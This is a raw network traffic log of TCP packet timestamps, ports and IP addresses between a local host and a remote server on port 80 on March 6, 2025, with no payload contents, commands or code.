Mar 6, 2025 07:06:14.852243900 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852283001 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852343082 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852381945 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852417946 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852435112 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.852435112 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.852457047 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852694035 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.852732897 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852823973 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852879047 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852879047 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.852917910 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.852930069 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.852953911 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853009939 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853046894 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853056908 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853091955 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853100061 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853136063 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853188038 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853235960 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853239059 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853275061 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853306055 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853308916 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853344917 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853379011 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853391886 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853418112 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853424072 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853452921 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853487968 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853530884 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853533983 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853583097 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853583097 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853617907 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853672028 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853722095 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853737116 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853759050 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853770018 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853795052 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853831053 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853883028 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.853885889 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853921890 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.853939056 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854033947 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854087114 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854121923 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854135036 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854156971 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854166031 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854197979 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854233027 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854266882 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854278088 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854301929 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854305983 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854336977 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854389906 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854424000 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854434013 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854461908 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854470968 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854515076 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854568958 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854603052 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854614973 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854640007 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854648113 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854675055 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854711056 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854746103 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854759932 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854782104 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854790926 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854816914 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854854107 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854887962 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854899883 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854923964 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854943991 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.854959965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.854995012 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.855029106 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.855041981 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.855066061 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.855072975 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.855102062 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.855137110 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.855171919 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.855192900 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.855217934 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.857841015 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.857893944 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.857928038 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.857963085 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.857964993 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858016014 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858071089 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858108997 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858144045 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858167887 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858167887 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858180046 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858232021 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858234882 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858279943 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858351946 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858387947 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858422995 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858457088 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858470917 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858494043 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858504057 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858527899 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858582020 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858618975 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858630896 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858653069 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858665943 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858689070 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858724117 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858757019 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858772039 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858794928 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858805895 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858830929 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858865976 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858899117 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858916044 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.858937025 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.858951092 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859278917 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859337091 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859371901 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859389067 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859417915 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859427929 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859462023 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859515905 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859550953 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859561920 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859587908 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859608889 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859623909 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859659910 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859713078 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859716892 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859749079 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859761000 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859786034 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859822989 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859858036 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859875917 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859900951 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.859911919 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859946012 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.859982014 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.860018969 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.860029936 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.860055923 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.860065937 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.860090971 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.860133886 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.860186100 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.872575998 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.901344061 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.901443958 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.901482105 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.901516914 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.901529074 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.901554108 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.901560068 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.901590109 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.901602983 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.901629925 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.904689074 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.942168951 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.942202091 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.942256927 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.942293882 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.942331076 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.942365885 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.942393064 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.942393064 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.942401886 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.942425966 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.942440033 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.942970037 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943026066 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943028927 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943064928 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943074942 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943101883 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943137884 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943172932 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943185091 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943226099 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943227053 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943262100 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943298101 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943347931 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943350077 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943386078 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943397999 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943438053 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943473101 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943507910 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943536997 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943543911 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943557978 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943594933 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943630934 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943685055 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943686008 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943722010 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943733931 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943758011 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943794966 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943825960 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943844080 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943865061 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943870068 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.943900108 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943943024 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943977118 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.943989038 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944029093 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944031000 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944067001 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944118977 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944168091 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944171906 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944221973 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944224119 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944259882 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944293976 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944340944 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944372892 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944406986 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944447041 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944463015 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944482088 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944500923 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944539070 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944574118 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944626093 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944628000 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944664955 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944699049 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944711924 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944735050 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944755077 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944770098 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944804907 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944843054 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944853067 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944878101 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944889069 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.944915056 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944948912 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.944983959 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945004940 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945019007 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945029020 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945090055 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945168018 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945204973 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945219040 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945242882 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945251942 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945280075 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945316076 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945352077 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945360899 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945389032 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945400953 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945425987 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945461035 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945497990 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945508003 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945580959 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945591927 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945617914 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945655107 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945689917 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945703030 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945724964 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945754051 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945758104 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945792913 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945827961 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945847034 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945863008 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945873976 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.945900917 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945935965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945970058 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.945981979 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.946007013 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.946017027 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.949438095 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.949491024 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.949526072 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.949558973 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.949568033 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.949584961 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.949605942 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.949639082 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.949676037 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.949687958 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.949712992 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.949723005 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.983402014 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983510017 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983563900 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983618021 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983670950 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983670950 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.983670950 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.983705044 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983740091 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983774900 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983809948 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983843088 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983875036 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.983876944 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983875036 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.983906984 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.983912945 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983916044 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.983947039 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.983979940 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.984014988 CET	80	49733	45.144.214.104	192.168.2.4
